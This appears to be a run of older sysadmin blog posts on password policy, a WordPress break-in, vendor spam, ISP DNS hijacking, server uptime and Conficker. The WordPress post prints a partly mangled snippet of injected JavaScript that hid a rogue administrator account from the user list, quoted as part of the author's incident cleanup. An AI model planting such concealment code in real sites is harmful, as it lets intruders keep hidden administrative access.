One of our early decisions was to balance the security of the system while making the system as user friendly as possible. Originally, we had a pretty strict password policy. We soon found that many of our customers were not too happy with this policy and thought it was too much. Were we out of control security freaks? Shouldn’t the customer appreciate the steps that we are taking to not only secure our servers, but their information!

Looking around at other vendors, we quickly found that we may be a bit too harsh. Take Gmail for example. Sure its not exchange. But then again it has over 100 million users. If they had massive issues with security and hacking, they clearly have it under control behind the scenes so things do not get out of hand.

And have you ever been prompted to change your password on gmail? I haven’t.

So we compromised. We altered the time between when the system forces you to change your password. We altered the number of passwords that you could recycle. And we also added a somewhat buried feature in our customer portal. That feature, ‘allow passwords to never expire’

Holy crap! Let’s just blow a huge freaking hole in the security system shall we.

This was a feature that we were not all that happy about, but with the other measures in place we figured we would avoid passwords such as abc123. It makes the end user happy, we have some level of security though not as high and tight as we would like. But its better than having things wide open.

Now here is the shocking part of this. 20% of our users have this feature enabled. 20-feaking-percent! I was really hoping for this number to be in the 5-10% range.
But no, 1 in 5 of our users will never change their password again.

Or will they?

I’m currently developing a nag script that will send out a reminder to the end users ever couple of months. Not enough to completely annoy the heck out of them. But hopefully enough to get a good portion of that 20% to change their passwords on a semi-regular basis.

So what do you do for your password policy? Leave your tips and tricks in the comments section. We’d like to hear what you think is an acceptable policy to stay secure!

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit on the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name for an admin. And peaking in the wp_usermeta table, I noticed the following attribute was assigned to their firstname:

for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator ((d+)) if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator ((d+))Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);


Its not formatted the greatest, but basically, it hides the username from the list. Nice eh! Simply deleting this entry made the user show up in the user list where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had starting defacing the site or hiding other gems on there.

-Matt

Here is the spam that I got from Verisign:

—— Forwarded Message
From: “Borgches, Sergio”
Date: Thu, 16 Jul 2009 11:39:24 -0500
To: Webmaster
Subject: Ineffective EV SSL Certificate on domain: my.lightedge.com

Dear Webmaster

Ineffective EV SSL Certificate on domain: my.lightedge.com

Are you aware that the Extended Validation (EV) SSL Certificate that
you have on your domain does not display the standard EV interface
that your customers are expecting on Firefox 3.5?

Mozilla launched the latest version of their browser, on 2 July 2009.
Not only has it won the Guinness World Record for more than a
million downloads in a short time, but Firefox 3 currently accounts
for over 20% of global browser market share.

Instead of displaying the GREEN address bar, which reassures visitors
that your site is safe and authentic, it is displaying the BLUE
address bar, which means they do not get the full benefit of EV.
(Please see screenshot attached).

A rapidly growing portion of your Web site visitors are not seeing
the green address bar. It has shown in research that users look for
the green address bar on the sites with which they transact and that
77% of users will hesitate to complete the transaction on a site that
once had the green address bar but no longer does (TecEd study,
2007).

VeriSign is the leader in EV SSL security and we would like to assist
you to rectify this problem by offering you a replacement EV SSL
Certificate AT NO CHARGE! Our Extended Validation SSL Certificates
trigger the green bar in Firefox 3.5. We work closely with the
browser manufacturers to make sure that our customers’ security is
always world class and that there are no interruptions in your online
security.

To take advantage of this offer, and to make sure that your address
bar is GREEN in all current EV-enabled browsers please contact me and
I’ll help you switch to VeriSign, the worldwide leader in trusted
Internet communications and commerce.

Yours faithfully

Sergio Borgches
Inside Sales Executive
VeriSign Security Services
sborgches@verisign.com
Toll Free: 866.893.6565 option 1 ext 2296

First off Sergio, the webmaster address? Really? Like anyone really reads that stuff anymore. Half the time these go to an admin buried deep in cubeland who has filters that take webmaster, hostmaster and yourmom@domain.com and filter them into the bit bucket. I have these same filters, I’m that guy! I just happened to be going through my spam folder (yes, it was caught as spam Sergio!) when I found this little gem. I just couldn’t pass it up. Here’s my advice Sergio, if you really wanted to get someone’s attention, you CALL them.

Now, besides the fact that you didn’t call, this is a bit like ambulance chasing if you ask me. And I can’t say that I really blame you for it, but it still makes you a scum bag. The issue isn’t with the certificate. The certificate is STILL an Extended Validation (EV) certificate that shows up with the green bar in just about every browser that is out there except for Firefox 3.5. Why? Well its a bug in the browser. More details can be found here. If you happen to have a Verisign, Thawte or I think GeoTrust, you’re fine. This just seems to be an issue with a few providers. Globalsign being one of those. But never fear, addons.mozilla.com is also protected by a GlobalSign EV certificate so they are well aware of this issue. But instead of taking the high road and just putting out a press release saying that Verisign customers are not affected by the latest EV certificate issues in FireFox 3.5, you took the lowest road of them all and sent out spam spreading fear, uncertainty and doubt. Way to keep it classy!

So this Sergio is why I’m not going to swing my business over to you. Sure you’re just trying to get a leg up on the competition. But the methods in which you are doing it make me want to work with GlobalSign even more.

Comcast has me scratching my head. A friend of mine pointed out the following post on the Comcast goofiness. For a long time now they have been messing with DNS and if you happen to screw up and look up a site that does not exist in DNS, you get the Comcast ad page. Many of the tech savvy folks out there simply got around that by putting up their own caching server or using opendns. I know I did when I found out that Mediacom started messing with DNS like this.

Apparently they have upped their game by routing all DNS traffic, no matter what, to their servers. You have no way around this, you WILL use their servers.

I disagree with the first practice of just having a * domain that has everything mis-spelled go to a certain site of yours. Now that they have taken this to a new level, I think it is quickly climbing up the all time ranks of dangerous and stupid.

Really, dangerous? Well, say I’m a person that has highly questionable morals and decides that the best way to attack a competative ISP is to go after their DNS servers. I could try and do some sort of DDoS. Or, the better, more devious approach is to attempt a DNS cache poisoning on their servers. Not always the easiest, but when done properly can have some pretty devastating effects. Now, I trust that Comcast has employed some top notch admins over there so I highly doubt that they are going to let their guard down here, but we’re all humans. We still make mistakes.

Why is this stupid? Honestly, do you click on the ads on one of these pages? Or do you swear to yourself, type it in correctly or load up google and search for what you really want? It just seems like a lot of hassle to implement and all they are really doing is pissing off their customers. They’re trying to milk every last cent out of them and the customers are not stupid. They know what comcast is trying to do. They’re pissed off and eventually they will leave.

The sad part is, other ISPs have already taken up the first goofy solution that Comcast put in place. Its only a matter of time until more people adopt this new tactic. For me personally, I’m going to smack the crap out of the first person that mentions this as a solution that we should deploy. I set up our DNS servers and I refuse to break the internet. I also have a higher respect for my customers. They’re all intelligent, reasonable, and good looking right?

But this sort of crap really needs to stop. Yes, its their operating system. But that doesn’t excuse installing add-ons to 3rd party applications and disabling the uninstall options. I’m with the writer of this article, this is a great way to get your customers to not trust you and precisely the reason I haven’t had windows on my desktop for 8 years.

A routine security update for a Microsoft Windows component installed on tens of millions of computers has quietly installed an extra add-on for an untold number of users surfing the Web with Mozilla’s Firefox Web browser.

Earlier this year, Microsoft shipped a bundle of updates known as a “service pack” for a programming platform called the Microsoft .NET Framework, which Microsoft and plenty of third-party developers use to run a variety of interactive programs on Windows.

The service pack for the .NET Framework, like other updates, was pushed out to users through the Windows Update Web site. A number of readers had never heard of this platform before Windows Update started offering the service pack for it, and many of you wanted to know whether it was okay to go ahead and install this thing. Having earlier checked to see whether the service pack had caused any widespread problems or interfered with third-party programs — and not finding any that warranted waving readers away from this update — I told readers not to worry and to go ahead and install it.

source

The list started off fairly respectable with a few people putting up some pathetic numbers of 15 days or 30 days. Someone threw out a 100+ and then someone managed to get a 400+. I decided it was time to put these folks to shame. I threw down the following:

matt@goober:~> uptime
03:30:14 up 1041 days, 10:41, 2 users, load average: 0.00, 0.00, 0.00

This is not my record, I have had a DNS server here at work at 1500+.

As usual, these email threads will bring out the security conscious folks who believe that if you haven’t updated your kernel, you’re a bad admin. I typically argue that if you are relying on only security patches, you’re probably not a good admin. It should always be a layered approach! Some people use k-splice on their boxes so they can patch the kernel effectively without a reboot. I don’t in this instance.

So, as always, I had to describe some of the security features of this box that would convince these people that I’m not just an ignorant ass. Here is how I do it.

First off, when I build a box, I install the bare minimum. This server happens to be a file server. It doesn’t need to serve up web pages so apache is not installed. It does need to send mail out from its local queue for monit messages so the smtp server is locked down by a firewall running on the server as well as the SMTP configuration is set to only listen on localhost. As I stated, the server has a local iptables FW running on it. It is also protected by a hardware firewall. I keep the various services the server provides up to date and patched up fully. I load minimal modules in the kernel. It is the bare bones of what it needs. In the instance where I can unmount, patch and remount the module, I do it. Other than that, I can ignore this box.

Do I do this for every server that I admin, no. At my current job we have the resources where just about every service that I role out is built in some sort of a high availability cluster. If I need to take down a node to patch it, I can. This server that I haven’t taken down in 2.5 years doesn’t have that luxury. Its also in California. So if I had a kernel update go south on me, I have to walk a buddy through getting it back up…over the phone. My buddy has some skills on the computer, but not necessarily a lot of Linux skills. So imagine walking your mom through the Linux command line. Scared yet?

I’m not trying to promote not patching your kernel. But what I am trying to promote is in some instances, maybe even in a lot of instances, you can get by with _not_ updating your kernel every time a new one comes out. Its about cost/benefit analysis. Not many sheople realize that it is actually a part of their job. Sometimes you don’t have $20K to put in a solution that will never go down. EVER! Sometimes you have a couple hundred bucks and you need to provide something that is stable, secure, and hassle free. And that’s what I have provided, going on 1042 days =)

On the surface, April 1 came and went without a peep from the dreaded Conficker megaworm. But security experts see a frightening reality, one where Conficker is now more powerful and more dangerous than ever.

In the first minute of April 1, Conficker did exactly what everyone knew it was going to do: It successfully phoned home for an update. And while it was fun to imagine what nasty payload that update may have included (it was fun, wasn’t it?), the result was not outwardly catastrophic; rather than a blueprint for world domination, the update contained instructions on how to dig in even deeper.

“The worm did exactly what everyone thought it was going to do, which is update itself,” security expert Dan Kaminsky, who helped develop a widely-used Conficker scanner in the days leading up to April 1, told us. “The world wants there to be fireworks, or some Ebola-class, computers-exploding-all-over-the-world event or God knows what, but the reality is…the Conficker developers have cemented their ability to push updates through any fences the good guys have managed to build in February and March.”

And here’s why that is deeply, deeply scary. As we explained, Conficker has built a zombie botnet infrastructure by registering hundreds of spam DNS names (askcw.com.ru, and the like), which it then links up and uses as nodes for infected machines to contact for instructions. In its earlier forms, Conficker attempted to register 250 such DNS names per day. But with the third version of the software, the Conficker.c variant which has been floating around for the last month or so, the number of spam DNS takeovers was boosted to 50,000 per day—a number security pros can no longer keep up with.

source

Yikes! This paints a pretty scary picture.

Looks like it might be time to install TrueCrypt for all of my files.

source

Surprisingly, we have seen the drop here at the office. We have a store and forward service and we have various statistical tools to serve us a graph of the volume. Check this out!

I didn’t think it would be a big drop, but one of the other admins pointed that out and we have seen it across all of our store and forward and relay servers. Attempts by bots and various other servers to try and send mail through our systems have drastically dropped.

What are you seeing?